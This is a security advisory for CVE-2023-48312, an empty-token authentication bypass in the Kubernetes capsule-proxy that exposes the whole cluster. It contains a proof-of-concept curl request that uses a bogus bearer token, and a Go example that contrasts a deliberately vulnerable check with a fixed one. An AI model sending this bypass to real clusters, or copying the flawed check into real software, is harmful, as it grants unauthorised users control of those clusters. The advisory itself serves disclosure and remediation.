
CVE-2023-48312 github.com/clastix/capsule-proxy

Package

Manager: go
Name: github.com/clastix/capsule-proxy
Vulnerable Version: >=0 <0.4.6

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00065 (percentile 0.20625)

Details

Capsule Proxy Authentication bypass using an empty token

The privilege escalation is based on a missing check of whether the user is actually authenticated according to the `TokenReview` result. All clusters running with the `anonymous-auth` Kubernetes API Server setting disabled (set to `false`) are affected, since it is possible to bypass the token review mechanism and interact with the upstream Kubernetes API Server.

# PoC

Start a KinD cluster with the `anonymous-auth` value set to `false`. If it is `true`, anonymous permissions are used, which are very limited by default.

```yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: ClusterConfiguration
    apiServer:
      extraArgs:
        anonymous-auth: "false"
```

Install `capsule` and `capsule-proxy`, then port-forward the proxy service:

```
k port-forward svc/capsule-proxy 9001
Forwarding from 127.0.0.1:9001 -> 9001
Forwarding from [::1]:9001 -> 9001
Handling connection for 9001
```

Then query the proxy:

```
curl -g -k -H 'Authorization: Bearer f' -X 'GET' 'https://localhost:9001/api/v1/namespaces'
```

# Impact

The whole cluster is exposed to unauthorised users. This privilege escalation cannot be exploited if you are relying only on client certificates (SSL/TLS).
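The bug class described above (a `TokenReview` response that is treated as a successful login without consulting its `Status.Authenticated` field) is easiest to see as a before/after pair. The following is an added illustration written for this page, not capsule-proxy's own code: the `tokenReviewStatus` struct, the `reviewer` function type, `fakeReviewer`, and the `authenticateVulnerable`/`authenticateFixed` names are all constructed here, and `tokenReviewStatus` only mirrors the handful of fields of the Kubernetes `authentication.k8s.io/v1` `TokenReviewStatus` type that matter for the check, so the example runs without the Kubernetes client libraries.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// tokenReviewStatus mirrors the subset of the Kubernetes TokenReviewStatus
// fields relevant to the decision (constructed locally for this example).
type tokenReviewStatus struct {
	Authenticated bool
	Username      string
	Groups        []string
	Error         string
}

// reviewer abstracts the call the proxy makes to the upstream API server's
// TokenReview endpoint. It returns a status plus any transport-level error.
type reviewer func(token string) (tokenReviewStatus, error)

// bearerToken extracts the token from an Authorization header, or returns ""
// if the header is absent, malformed, or carries an empty token.
func bearerToken(header string) string {
	const prefix = "Bearer "
	if !strings.HasPrefix(header, prefix) {
		return ""
	}
	return strings.TrimSpace(strings.TrimPrefix(header, prefix))
}

// authenticateVulnerable models the missing check: as long as the TokenReview
// round-trip itself succeeded, the request is treated as coming from an
// authenticated user, even though Status.Authenticated is false and no
// username was returned. A caller that proxies on a nil error is bypassed.
func authenticateVulnerable(review reviewer, header string) (string, error) {
	status, err := review(bearerToken(header))
	if err != nil {
		return "", err
	}
	return status.Username, nil // BUG: status.Authenticated is never consulted
}

// authenticateFixed rejects the request unless the API server positively
// asserted that the token authenticates a concrete user.
func authenticateFixed(review reviewer, header string) (string, error) {
	token := bearerToken(header)
	if token == "" {
		return "", errors.New("missing or empty bearer token")
	}
	status, err := review(token)
	if err != nil {
		return "", fmt.Errorf("token review request failed: %w", err)
	}
	if status.Error != "" {
		return "", fmt.Errorf("token review error: %s", status.Error)
	}
	if !status.Authenticated {
		return "", errors.New("token review did not authenticate the token")
	}
	if status.Username == "" {
		return "", errors.New("token review returned no user identity")
	}
	return status.Username, nil
}

// fakeReviewer is a constructed stand-in for an API server running with
// anonymous-auth=false: only one constructed token is considered valid, and
// anything else comes back as a well-formed but unauthenticated review.
func fakeReviewer(token string) (tokenReviewStatus, error) {
	if token == "valid-token" {
		return tokenReviewStatus{Authenticated: true, Username: "alice", Groups: []string{"tenant-a"}}, nil
	}
	return tokenReviewStatus{Authenticated: false}, nil
}

func main() {
	for _, header := range []string{"Bearer f", "Bearer ", "Bearer valid-token"} {
		u1, err1 := authenticateVulnerable(fakeReviewer, header)
		u2, err2 := authenticateFixed(fakeReviewer, header)
		fmt.Printf("%-20q vulnerable=(%q,%v) fixed=(%q,%v)\n", header, u1, err1, u2, err2)
	}
}
```

The `Bearer f` request from the PoC passes the vulnerable path with a nil error and an empty identity, which is exactly the condition a proxy must never forward upstream; the fixed path fails closed on an empty token, on a review error, and on `Authenticated == false`.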

Metadata

Created: 2023-11-24T16:53:25Z
Modified: 2023-11-27T22:07:37Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-fpvw-6m5v-hqfp/GHSA-fpvw-6m5v-hqfp.json
CWE IDs: ["CWE-287"]
Alternative ID: GHSA-fpvw-6m5v-hqfp
Finding: F039
Auto approve: 1